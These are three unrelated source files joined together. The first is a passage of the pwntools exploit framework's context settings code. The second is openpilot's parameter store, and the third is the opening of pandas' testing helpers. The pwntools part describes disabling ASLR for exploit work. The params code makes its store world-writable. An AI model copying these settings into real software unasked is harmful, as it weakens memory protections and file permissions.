raise AttributeError('AttributeError: arch must be one of %r' % sorted(self.architectures))
for k,v in defaults.items():
if k not in self._tls:
self._tls[k] = v
return arch
@_validator
def aslr(self, aslr):
"""
ASLR settings for new processes.
If :const:`False`, attempt to disable ASLR in all processes which are
created via ``personality`` (``setarch -R``) and ``setrlimit``
(``ulimit -s unlimited``).
The ``setarch`` changes are lost if a ``setuid`` binary is executed.
"""
return bool(aslr)
@_validator
def kernel(self, arch):
"""
Target machine's kernel architecture.
Usually, this is the same as ``arch``, except when
running a 32-bit binary on a 64-bit kernel (e.g. i386-on-amd64).
Even then, this doesn't matter much -- only when the the segment
registers need to be known
"""
with self.local(arch=arch):
return self.arch
@_validator
def bits(self, bits):
"""
Target machine word size, in bits (i.e. the size of general purpose registers).
The default value is ``32``, but changes according to :attr:`arch`.
Examples:
>>> context.clear()
>>> context.bits == 32
True
>>> context.bits = 64
>>> context.bits == 64
True
>>> context.bits = -1 #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: bits must be > 0 (-1)
"""
bits = int(bits)
if bits <= 0:
raise AttributeError("bits must be > 0 (%r)" % bits)
return bits
@_validator
def binary(self, binary):
"""
Infer target architecture, bit-with, and endianness from a binary file.
Data type is a :class:`pwnlib.elf.ELF` object.
Examples:
>>> context.clear()
>>> context.arch, context.bits
('i386', 32)
>>> context.binary = '/bin/bash'
>>> context.arch, context.bits
('amd64', 64)
>>> context.binary
ELF('/bin/bash')
"""
# Cyclic imports... sorry Idolf.
from pwnlib.elf import ELF
if not isinstance(binary, ELF):
binary = ELF(binary)
self.arch = binary.arch
self.bits = binary.bits
self.endian = binary.endian
self.os = binary.os
return binary
@property
def bytes(self):
"""
Target machine word size, in bytes (i.e. the size of general purpose registers).
This is a convenience wrapper around ``bits // 8``.
Examples:
>>> context.bytes = 1
>>> context.bits == 8
True
>>> context.bytes = 0 #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: bits must be > 0 (0)
"""
return self.bits // 8
@bytes.setter
def bytes(self, value):
self.bits = value*8
@_validator
def encoding(self, charset):
if charset == 'auto':
return charset
if ( b'aA'.decode(charset) != 'aA'
or 'aA'.encode(charset) != b'aA'):
raise ValueError('Strange encoding!')
return charset
def _encode(self, s):
if isinstance(s, (bytes, bytearray)):
return s # already bytes
if self.encoding == 'auto':
try:
return s.encode('latin1')
except UnicodeEncodeError:
return s.encode('utf-8', 'surrogateescape')
return s.encode(self.encoding)
def _decode(self, b):
if self.encoding == 'auto':
try:
return b.decode('utf-8')
except UnicodeDecodeError:
return b.decode('latin1')
except AttributeError:
return b
return b.decode(self.encoding)
@_validator
def endian(self, endianness):
"""
Endianness of the target machine.
The default value is ``'little'``, but changes according to :attr:`arch`.
Raises:
AttributeError: An invalid endianness was provided
Examples:
>>> context.clear()
>>> context.endian == 'little'
True
>>> context.endian = 'big'
>>> context.endian
'big'
>>> context.endian = 'be'
>>> context.endian == 'big'
True
>>> context.endian = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: endian must be one of ['be', 'big', 'eb', 'el', 'le', 'little']
"""
endian = endianness.lower()
if endian not in self.endiannesses:
raise AttributeError("endian must be one of %r" % sorted(self.endiannesses))
return self.endiannesses[endian]
@_validator
def log_level(self, value):
"""
Sets the verbosity of ``pwntools`` logging mechanism.
More specifically it controls the filtering of messages that happens
inside the handler for logging to the screen. So if you want e.g. log
all messages to a file, then this attribute makes no difference to you.
Valid values are specified by the standard Python ``logging`` module.
Default value is set to ``INFO``.
Examples:
>>> context.log_level = 'error'
>>> context.log_level == logging.ERROR
True
>>> context.log_level = 10
>>> context.log_level = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: log_level must be an integer or one of ['CRITICAL', 'DEBUG', 'ERROR', 'INFO', 'NOTSET', 'WARN', 'WARNING']
"""
# If it can be converted into an int, success
try: return int(value)
except ValueError: pass
# If it is defined in the logging module, success
try: return getattr(logging, value.upper())
except AttributeError: pass
# Otherwise, fail
level_names = filter(lambda x: isinstance(x,str), logging._levelNames)
permitted = sorted(level_names)
raise AttributeError('log_level must be an integer or one of %r' % permitted)
@_validator
def log_file(self, value):
r"""
Sets the target file for all logging output.
Works in a similar fashion to :attr:`log_level`.
Examples:
>>> foo_txt = tempfile.mktemp()
>>> bar_txt = tempfile.mktemp()
>>> context.log_file = foo_txt
>>> log.debug('Hello!')
>>> with context.local(log_level='ERROR'): #doctest: +ELLIPSIS
... log.info('Hello again!')
>>> with context.local(log_file=bar_txt):
... log.debug('Hello from bar!')
>>> log.info('Hello from foo!')
>>> open(foo_txt).readlines()[-3] #doctest: +ELLIPSIS
'...:DEBUG:...:Hello!\n'
>>> open(foo_txt).readlines()[-2] #doctest: +ELLIPSIS
'...:INFO:...:Hello again!\n'
>>> open(foo_txt).readlines()[-1] #doctest: +ELLIPSIS
'...:INFO:...:Hello from foo!\n'
>>> open(bar_txt).readlines()[-1] #doctest: +ELLIPSIS
'...:DEBUG:...:Hello from bar!\n'
"""
if isinstance(value, (bytes, six.text_type)):
# check if mode was specified as "[value],[mode]"
if ',' not in value:
value += ',a'
filename, mode = value.rsplit(',', 1)
value = open(filename, mode)
elif not hasattr(value, "fileno"):
raise AttributeError('log_file must be a file')
# Is this the same file we already have open?
# If so, don't re-print the banner.
if self.log_file and not isinstance(self.log_file, _devnull):
a = os.fstat(value.fileno()).st_ino
b = os.fstat(self.log_file.fileno()).st_ino
if a == b:
return self.log_file
iso_8601 = '%Y-%m-%dT%H:%M:%S'
lines = [
'=' * 78,
' Started at %s ' % time.strftime(iso_8601),
' sys.argv = [',
]
for arg in sys.argv:
lines.append(' %r,' % arg)
lines.append(' ]')
lines.append('=' * 78)
for line in lines:
value.write('=%-78s=\n' % line)
value.flush()
return value
@_validator
def log_console(self, stream):
"""
Sets the default logging console target.
Examples:
>>> context.log_level = 'warn'
>>> log.warn("Hello")
[!] Hello
>>> context.log_console=open('/dev/null', 'w')
>>> log.warn("Hello")
>>> context.clear()
"""
if isinstance(stream, str):
stream = open(stream, 'wt')
return stream
@property
def mask(self):
return (1 << self.bits) - 1
@_validator
def os(self, os):
"""
Operating system of the target machine.
The default value is ``linux``.
Allowed values are listed in :attr:`pwnlib.context.ContextType.oses`.
Examples:
>>> context.os = 'linux'
>>> context.os = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: os must be one of ['android', 'baremetal', 'cgc', 'freebsd', 'linux', 'windows']
"""
os = os.lower()
if os not in self.oses:
raise AttributeError("os must be one of %r" % self.oses)
return os
@_validator
def randomize(self, r):
"""
Global flag that lots of things should be randomized.
"""
return bool(r)
@_validator
def signed(self, signed):
"""
Signed-ness for packing operation when it's not explicitly set.
Can be set to any non-string truthy value, or the specific string
values ``'signed'`` or ``'unsigned'`` which are converted into
:const:`True` and :const:`False` correspondingly.
Examples:
>>> context.signed
False
>>> context.signed = 1
>>> context.signed
True
>>> context.signed = 'signed'
>>> context.signed
True
>>> context.signed = 'unsigned'
>>> context.signed
False
>>> context.signed = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: signed must be one of ['no', 'signed', 'unsigned', 'yes'] or a non-string truthy value
"""
try: signed = self.signednesses[signed]
except KeyError: pass
if isinstance(signed, str):
raise AttributeError('signed must be one of %r or a non-string truthy value' % sorted(self.signednesses))
return bool(signed)
@_validator
def timeout(self, value=Timeout.default):
"""
Default amount of time to wait for a blocking operation before it times out,
specified in seconds.
The default value is to have an infinite timeout.
See :class:`pwnlib.timeout.Timeout` for additional information on
valid values.
"""
return Timeout(value).timeout
@_validator
def terminal(self, value):
"""
Default terminal used by :meth:`pwnlib.util.misc.run_in_new_terminal`.
Can be a string or an iterable of strings. In the latter case the first
entry is the terminal and the rest are default arguments.
"""
if isinstance(value, (bytes, six.text_type)):
return [value]
return value
@property
def abi(self):
return self._abi
@_validator
def proxy(self, proxy):
"""
Default proxy for all socket connections.
Accepts either a string (hostname or IP address) for a SOCKS5 proxy on
the default port, **or** a ``tuple`` passed to ``socks.set_default_proxy``,
e.g. ``(socks.SOCKS4, 'localhost', 1234)``.
>>> context.proxy = 'localhost' #doctest: +ELLIPSIS
>>> r=remote('google.com', 80)
Traceback (most recent call last):
...
ProxyConnectionError: Error connecting to SOCKS5 proxy localhost:1080: [Errno 111] Connection refused
>>> context.proxy = None
>>> r=remote('google.com', 80, level='error')
"""
if not proxy:
socket.socket = _original_socket
return None
if isinstance(proxy, str):
proxy = (socks.SOCKS5, proxy)
if not isinstance(proxy, Iterable):
raise AttributeError('proxy must be a string hostname, or tuple of arguments for socks.set_default_proxy')
socks.set_default_proxy(*proxy)
socket.socket = socks.socksocket
return proxy
@_validator
def noptrace(self, value):
"""Disable all actions which rely on ptrace.
This is useful for switching between local exploitation with a debugger,
and remote exploitation (without a debugger).
This option can be set with the ``NOPTRACE`` command-line argument.
"""
return bool(value)
@_validator
def adb_host(self, value):
"""Sets the target host which is used for ADB.
This is useful for Android exploitation.
The default value is inherited from ANDROID_ADB_SERVER_HOST, or set
to the default 'localhost'.
"""
return str(value)
@_validator
def adb_port(self, value):
"""Sets the target port which is used for ADB.
This is useful for Android exploitation.
The default value is inherited from ANDROID_ADB_SERVER_PORT, or set
to the default 5037.
"""
return int(value)
@_validator
def device(self, device):
"""Sets the device being operated on.
"""
if isinstance(device, (bytes, six.text_type)):
device = Device(device)
if isinstance(device, Device):
self.arch = device.arch or self.arch
self.bits = device.bits or self.bits
self.endian = device.endian or self.endian
self.os = device.os or self.os
elif device is not None:
raise AttributeError("device must be either a Device object or a serial number as a string")
return device
@property
def adb(self):
"""Returns an argument array for connecting to adb.
Unless ``$ADB_PATH`` is set, uses the default ``adb`` binary in ``$PATH``.
"""
ADB_PATH = os.environ.get('ADB_PATH', 'adb')
command = [ADB_PATH]
if self.adb_host != self.defaults['adb_host']:
command += ['-H', self.adb_host]
if self.adb_port != self.defaults['adb_port']:
command += ['-P', str(self.adb_port)]
if self.device:
command += ['-s', str(self.device)]
return command
@_validator
def buffer_size(self, size):
"""Internal buffer size to use for :class:`pwnlib.tubes.tube.tube` objects.
This is not the maximum size of the buffer, but this is the amount of data
which is passed to each raw ``read`` syscall (or equivalent).
"""
return int(size)
@property
def cache_dir(self):
"""Directory used for caching data.
Note:
May be either a path string, or :const:`None`.
Example:
>>> cache_dir = context.cache_dir
>>> cache_dir is not None
True
>>> os.chmod(cache_dir, 0o000)
>>> context.cache_dir is None
True
>>> os.chmod(cache_dir, 0o755)
>>> cache_dir == context.cache_dir
True
"""
xdg_cache_home = os.environ.get('XDG_CACHE_HOME') or \
os.path.join(os.path.expanduser('~'), '.cache')
if not os.access(xdg_cache_home, os.W_OK):
return None
cache = os.path.join(xdg_cache_home, '.pwntools-cache-%d.%d' % sys.version_info[:2])
if not os.path.exists(cache):
try:
os.mkdir(cache)
except OSError:
return None
# Some wargames e.g. pwnable.kr have created dummy directories
# which cannot be modified by the user account (owned by root).
if not os.access(cache, os.W_OK):
return None
return cache
@_validator
def delete_corefiles(self, v):
"""Whether pwntools automatically deletes corefiles after exiting.
This only affects corefiles accessed via :attr:`.process.corefile`.
Default value is ``False``.
"""
return bool(v)
@_validator
def rename_corefiles(self, v):
"""Whether pwntools automatically renames corefiles.
This is useful for two things:
- Prevent corefiles from being overwritten, if ``kernel.core_pattern``
is something simple like ``"core"``.
- Ensure corefiles are generated, if ``kernel.core_pattern`` uses ``apport``,
which refuses to overwrite any existing files.
This only affects corefiles accessed via :attr:`.process.corefile`.
Default value is ``True``.
"""
return bool(v)
@_validator
def newline(self, v):
"""Line ending used for Tubes by default.
This configures the newline emitted by e.g. ``sendline`` or that is used
as a delimiter for e.g. ``recvline``.
"""
return six.ensure_binary(v)
@_validator
def gdbinit(self, value):
"""Path to the gdbinit that is used when running GDB locally.
This is useful if you want pwntools-launched GDB to include some additional modules,
like PEDA but you do not want to have GDB include them by default.
The setting will only apply when GDB is launched locally since remote hosts may not have
the necessary requirements for the gdbinit.
If set to an empty string, GDB will use the default `~/.gdbinit`.
Default value is ``""``.
"""
return str(value)
@_validator
def cyclic_alphabet(self, alphabet):
"""Cyclic alphabet.
Default value is `string.ascii_lowercase`.
"""
# Do not allow multiple occurrences
if len(set(alphabet)) != len(alphabet):
raise AttributeError("cyclic alphabet cannot contain duplicates")
return alphabet.encode()
@_validator
def cyclic_size(self, size):
"""Cyclic pattern size.
Default value is `4`.
"""
size = int(size)
if size > self.bytes:
raise AttributeError("cyclic pattern size cannot be larger than word size")
return size
@_validator
def ssh_session(self, shell):
from pwnlib.tubes.ssh import ssh
if not isinstance(shell, ssh):
raise AttributeError("context.ssh_session must be an ssh tube")
return shell
#*************************************************************************
# ALIASES
#*************************************************************************
#
# These fields are aliases for fields defined above, either for
# convenience or compatibility.
#
#*************************************************************************
def __call__(self, **kwargs):
"""
Alias for :meth:`pwnlib.context.ContextType.update`
"""
return self.update(**kwargs)
def reset_local(self):
"""
Deprecated. Use :meth:`clear`.
"""
self.clear()
@property
def endianness(self):
"""
Legacy alias for :attr:`endian`.
Examples:
>>> context.endian == context.endianness
True
"""
return self.endian
@endianness.setter
def endianness(self, value):
self.endian = value
@property
def sign(self):
"""
Alias for :attr:`signed`
"""
return self.signed
@sign.setter
def sign(self, value):
self.signed = value
@property
def signedness(self):
"""
Alias for :attr:`signed`
"""
return self.signed
@signedness.setter
def signedness(self, value):
self.signed = value
@property
def word_size(self):
"""
Alias for :attr:`bits`
"""
return self.bits
@word_size.setter
def word_size(self, value):
self.bits = value
Thread = Thread
#: Global :class:`.ContextType` object, used to store commonly-used pwntools settings.
#:
#: In most cases, the context is used to infer default variables values.
#: For example, :func:`.asm` can take an ``arch`` parameter as a
#: keyword argument.
#:
#: If it is not supplied, the ``arch`` specified by ``context`` is used instead.
#:
#: Consider it a shorthand to passing ``os=`` and ``arch=`` to every single
#: function call.
context = ContextType()
# Inherit default ADB values
if 'ANDROID_ADB_SERVER_HOST' in os.environ:
context.adb_host = os.environ.get('ANDROID_ADB_SERVER_HOST')
if 'ANDROID_ADB_SERVER_PORT' in os.environ:
context.adb_port = int(os.getenv('ANDROID_ADB_SERVER_PORT'))
def LocalContext(function):
"""
Wraps the specified function on a context.local() block, using kwargs.
Example:
>>> context.clear()
>>> @LocalContext
... def printArch():
... print(context.arch)
>>> printArch()
i386
>>> printArch(arch='arm')
arm
"""
@functools.wraps(function)
def setter(*a, **kw):
with context.local(**{k:kw.pop(k) for k,v in tuple(kw.items()) if isinstance(getattr(ContextType, k, None), property)}):
arch = context.arch
bits = context.bits
endian = context.endian
# Prevent the user from doing silly things with invalid
# architecture / bits / endianness combinations.
if (arch == 'i386' and bits != 32) \
or (arch == 'amd64' and bits != 64):
raise AttributeError("Invalid arch/bits combination: %s/%s" % (arch, bits))
if arch in ('i386', 'amd64') and endian == 'big':
raise AttributeError("Invalid arch/endianness combination: %s/%s" % (arch, endian))
return function(*a, **kw)
return setter
def LocalNoarchContext(function):
"""
Same as LocalContext, but resets arch to :const:`'none'` by default
Example:
>>> @LocalNoarchContext
... def printArch():
... print(context.arch)
>>> printArch()
none
"""
@functools.wraps(function)
def setter(*a, **kw):
kw.setdefault('arch', 'none')
with context.local(**{k:kw.pop(k) for k,v in tuple(kw.items()) if isinstance(getattr(ContextType, k, None), property)}):
return function(*a, **kw)
return setter
# Read configuration options from the context section
def update_context_defaults(section):
# Circular imports FTW!
from pwnlib.util import safeeval
from pwnlib.log import getLogger
log = getLogger(__name__)
for key, value in section.items():
if key not in ContextType.defaults:
log.warn("Unknown configuration option %r in section %r" % (key, 'context'))
continue
default = ContextType.defaults[key]
if isinstance(default, six.string_types + six.integer_types + (tuple, list, dict)):
value = safeeval.expr(value)
else:
log.warn("Unsupported configuration option %r in section %r" % (key, 'context'))
# Attempt to set the value, to see if it is value:
try:
with context.local(**{key: value}):
value = getattr(context, key)
except (ValueError, AttributeError) as e:
log.warn("Could not set context.%s=%s via pwn.conf (%s)", key, section[key], e)
continue
ContextType.defaults[key] = value
register_config('context', update_context_defaults)
|
params.py
|
#!/usr/bin/env python3
"""ROS has a parameter server, we have files.
The parameter store is a persistent key value store, implemented as a directory with a writer lock.
On Android, we store params under params_dir = /data/params. The writer lock is a file
"<params_dir>/.lock" taken using flock(), and data is stored in a directory symlinked to by
"<params_dir>/d".
Each key, value pair is stored as a file with named <key> with contents <value>, located in
<params_dir>/d/<key>
Readers of a single key can just open("<params_dir>/d/<key>") and read the file contents.
Readers who want a consistent snapshot of multiple keys should take the lock.
Writers should take the lock before modifying anything. Writers should also leave the DB in a
consistent state after a crash. The implementation below does this by copying all params to a temp
directory <params_dir>/<tmp>, then atomically symlinking <params_dir>/<d> to <params_dir>/<tmp>
before deleting the old <params_dir>/<d> directory.
Writers that only modify a single key can simply take the lock, then swap the corresponding value
file in place without messing with <params_dir>/d.
"""
import time
import os
import string
import binascii
import errno
import sys
import shutil
import fcntl
import tempfile
import threading
from enum import Enum
from common.basedir import PARAMS
def mkdirs_exists_ok(path):
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
class TxType(Enum):
PERSISTENT = 1
CLEAR_ON_MANAGER_START = 2
CLEAR_ON_PANDA_DISCONNECT = 3
class UnknownKeyName(Exception):
pass
keys = {
"AccessToken": [TxType.CLEAR_ON_MANAGER_START],
"AthenadPid": [TxType.PERSISTENT],
"CalibrationParams": [TxType.PERSISTENT],
"CarParams": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarParamsCache": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarVin": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CommunityFeaturesToggle": [TxType.PERSISTENT],
"CompletedTrainingVersion": [TxType.PERSISTENT],
"ControlsParams": [TxType.PERSISTENT],
"DisablePowerDown": [TxType.PERSISTENT],
"DoUninstall": [TxType.CLEAR_ON_MANAGER_START],
"DongleId": [TxType.PERSISTENT],
"GitBranch": [TxType.PERSISTENT],
"GitCommit": [TxType.PERSISTENT],
"GitRemote": [TxType.PERSISTENT],
"GithubSshKeys": [TxType.PERSISTENT],
"HasAcceptedTerms": [TxType.PERSISTENT],
"HasCompletedSetup": [TxType.PERSISTENT],
"IsLdwEnabled": [TxType.PERSISTENT],
"IsGeofenceEnabled": [TxType.PERSISTENT],
"IsMetric": [TxType.PERSISTENT],
"IsOffroad": [TxType.CLEAR_ON_MANAGER_START],
"IsRHD": [TxType.PERSISTENT],
"IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"IsUpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"IsUploadRawEnabled": [TxType.PERSISTENT],
"LastUpdateTime": [TxType.PERSISTENT],
"LimitSetSpeed": [TxType.PERSISTENT],
"LimitSetSpeedNeural": [TxType.PERSISTENT],
"LiveParameters": [TxType.PERSISTENT],
"LongitudinalControl": [TxType.PERSISTENT],
"OpenpilotEnabledToggle": [TxType.PERSISTENT],
"LaneChangeEnabled": [TxType.PERSISTENT],
"PandaFirmware": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaFirmwareHex": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaDongleId": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Passive": [TxType.PERSISTENT],
"RecordFront": [TxType.PERSISTENT],
"ReleaseNotes": [TxType.PERSISTENT],
"ShouldDoUpdate": [TxType.CLEAR_ON_MANAGER_START],
"SpeedLimitOffset": [TxType.PERSISTENT],
"SubscriberInfo": [TxType.PERSISTENT],
"TermsVersion": [TxType.PERSISTENT],
"TrainingVersion": [TxType.PERSISTENT],
"UpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"UpdateFailedCount": [TxType.CLEAR_ON_MANAGER_START],
"Version": [TxType.PERSISTENT],
"Offroad_ChargeDisabled": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_ConnectivityNeeded": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_ConnectivityNeededPrompt": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_TemperatureTooHigh": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_PandaFirmwareMismatch": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_InvalidTime": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
}
def fsync_dir(path):
fd = os.open(path, os.O_RDONLY)
try:
os.fsync(fd)
finally:
os.close(fd)
class FileLock():
def __init__(self, path, create):
self._path = path
self._create = create
self._fd = None
def acquire(self):
self._fd = os.open(self._path, os.O_CREAT if self._create else 0)
fcntl.flock(self._fd, fcntl.LOCK_EX)
def release(self):
if self._fd is not None:
os.close(self._fd)
self._fd = None
class DBAccessor():
def __init__(self, path):
self._path = path
self._vals = None
def keys(self):
self._check_entered()
return self._vals.keys()
def get(self, key):
self._check_entered()
try:
return self._vals[key]
except KeyError:
return None
def _get_lock(self, create):
lock = FileLock(os.path.join(self._path, ".lock"), create)
lock.acquire()
return lock
def _read_values_locked(self):
"""Callers should hold a lock while calling this method."""
vals = {}
try:
data_path = self._data_path()
keys = os.listdir(data_path)
for key in keys:
with open(os.path.join(data_path, key), "rb") as f:
vals[key] = f.read()
except (OSError, IOError) as e:
# Either the DB hasn't been created yet, or somebody wrote a bug and left the DB in an
# inconsistent state. Either way, return empty.
if e.errno == errno.ENOENT:
return {}
return vals
def _data_path(self):
return os.path.join(self._path, "d")
def _check_entered(self):
if self._vals is None:
raise Exception("Must call __enter__ before using DB")
class DBReader(DBAccessor):
def __enter__(self):
try:
lock = self._get_lock(False)
except OSError as e:
# Do not create lock if it does not exist.
if e.errno == errno.ENOENT:
self._vals = {}
return self
try:
# Read everything.
self._vals = self._read_values_locked()
return self
finally:
lock.release()
def __exit__(self, type, value, traceback): pass
class DBWriter(DBAccessor):
def __init__(self, path):
super(DBWriter, self).__init__(path)
self._lock = None
self._prev_umask = None
def put(self, key, value):
self._vals[key] = value
def delete(self, key):
self._vals.pop(key, None)
def __enter__(self):
mkdirs_exists_ok(self._path)
# Make sure we can write and that permissions are correct.
self._prev_umask = os.umask(0)
try:
os.chmod(self._path, 0o777)
self._lock = self._get_lock(True)
self._vals = self._read_values_locked()
except:
os.umask(self._prev_umask)
self._prev_umask = None
raise
return self
def __exit__(self, type, value, traceback):
self._check_entered()
try:
# data_path refers to the externally used path to the params. It is a symlink.
# old_data_path is the path currently pointed to by data_path.
# tempdir_path is a path where the new params will go, which the new data path will point to.
# new_data_path is a temporary symlink that will atomically overwrite data_path.
#
# The current situation is:
# data_path -> old_data_path
# We're going to write params data to tempdir_path
# tempdir_path -> params data
# Then point new_data_path to tempdir_path
# new_data_path -> tempdir_path
# Then atomically overwrite data_path with new_data_path
# data_path -> tempdir_path
old_data_path = None
new_data_path = None
tempdir_path = tempfile.mkdtemp(prefix=".tmp", dir=self._path)
try:
# Write back all keys.
os.chmod(tempdir_path, 0o777)
for k, v in self._vals.items():
with open(os.path.join(tempdir_path, k), "wb") as f:
f.write(v)
f.flush()
os.fsync(f.fileno())
fsync_dir(tempdir_path)
data_path = self._data_path()
try:
old_data_path = os.path.join(self._path, os.readlink(data_path))
except (OSError, IOError):
# NOTE(mgraczyk): If other DB implementations have bugs, this could cause
# copies to be left behind, but we still want to overwrite.
pass
new_data_path = "{}.link".format(tempdir_path)
os.symlink(os.path.basename(tempdir_path), new_data_path)
os.rename(new_data_path, data_path)
fsync_dir(self._path)
finally:
# If the rename worked, we can delete the old data. Otherwise delete the new one.
success = new_data_path is not None and os.path.exists(data_path) and (
os.readlink(data_path) == os.path.basename(tempdir_path))
if success:
if old_data_path is not None:
shutil.rmtree(old_data_path)
else:
shutil.rmtree(tempdir_path)
# Regardless of what happened above, there should be no link at new_data_path.
if new_data_path is not None and os.path.islink(new_data_path):
os.remove(new_data_path)
finally:
os.umask(self._prev_umask)
self._prev_umask = None
# Always release the lock.
self._lock.release()
self._lock = None
def read_db(params_path, key):
path = "%s/d/%s" % (params_path, key)
try:
with open(path, "rb") as f:
return f.read()
except IOError:
return None
def write_db(params_path, key, value):
if isinstance(value, str):
value = value.encode('utf8')
prev_umask = os.umask(0)
lock = FileLock(params_path+"/.lock", True)
lock.acquire()
try:
tmp_path = tempfile.mktemp(prefix=".tmp", dir=params_path)
with open(tmp_path, "wb") as f:
f.write(value)
f.flush()
os.fsync(f.fileno())
path = "%s/d/%s" % (params_path, key)
os.rename(tmp_path, path)
fsync_dir(os.path.dirname(path))
finally:
os.umask(prev_umask)
lock.release()
class Params():
def __init__(self, db=PARAMS):
self.db = db
# create the database if it doesn't exist...
if not os.path.exists(self.db+"/d"):
with self.transaction(write=True):
pass
def clear_all(self):
shutil.rmtree(self.db, ignore_errors=True)
with self.transaction(write=True):
pass
def transaction(self, write=False):
if write:
return DBWriter(self.db)
else:
return DBReader(self.db)
def _clear_keys_with_type(self, tx_type):
with self.transaction(write=True) as txn:
for key in keys:
if tx_type in keys[key]:
txn.delete(key)
def manager_start(self):
self._clear_keys_with_type(TxType.CLEAR_ON_MANAGER_START)
def panda_disconnect(self):
self._clear_keys_with_type(TxType.CLEAR_ON_PANDA_DISCONNECT)
def delete(self, key):
with self.transaction(write=True) as txn:
txn.delete(key)
def get(self, key, block=False, encoding=None):
if key not in keys:
raise UnknownKeyName(key)
while 1:
ret = read_db(self.db, key)
if not block or ret is not None:
break
# is polling really the best we can do?
time.sleep(0.05)
if ret is not None and encoding is not None:
ret = ret.decode(encoding)
return ret
def put(self, key, dat):
"""
Warning: This function blocks until the param is written to disk!
In very rare cases this can take over a second, and your code will hang.
Use the put_nonblocking helper function in time sensitive code, but
in general try to avoid writing params as much as possible.
"""
if key not in keys:
raise UnknownKeyName(key)
write_db(self.db, key, dat)
def put_nonblocking(key, val):
def f(key, val):
params = Params()
params.put(key, val)
t = threading.Thread(target=f, args=(key, val))
t.start()
return t
if __name__ == "__main__":
params = Params()
if len(sys.argv) > 2:
params.put(sys.argv[1], sys.argv[2])
else:
for k in keys:
pp = params.get(k)
if pp is None:
print("%s is None" % k)
elif all(chr(c) in string.printable for c in pp):
print("%s = %s" % (k, pp))
else:
print("%s = %s" % (k, binascii.hexlify(pp)))
# Test multiprocess:
# seq 0 100000 | xargs -P20 -I{} python common/params.py DongleId {} && sleep 0.05
# while python common/params.py DongleId; do sleep 0.05; done
|
_testing.py
|
import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import os
from shutil import rmtree
import string
import tempfile
from typing import Any, Callable, List, Optional, Type, Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
import pandas._libs.testing as _testing
from pandas._typing import FilePathOrBuffer, FrameOrSeries
from pandas.compat import _get_lzma_file, _import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_list_like,
is_number,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
lzma = _import_lzma()
N = 30
K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("always", _testing_mode_warnings)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("ignore", _testing_mode_warnings)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(
obj: Any, path: Optional[FilePathOrBuffer] = None
) -> FrameOrSeries:
"""
Pickle an object and then read it again.
Parameters
----------
obj : any object
The object to pickle and then re-read.
path : str, path object or file-like object, default None
The path where the pickled object is written and then read.
Returns
-------
pandas object
The original object that was pickled and then re-read.
"""
_path = path
if _path is None:
_path = f"__{rands(10)}__.pickle"
with ensure_clean(_path) as temp_path:
pd.to_pickle(obj, temp_path)
return pd.read_pickle(temp_path)
def round_trip_pathlib(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a py.path LocalPath and read it back.
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
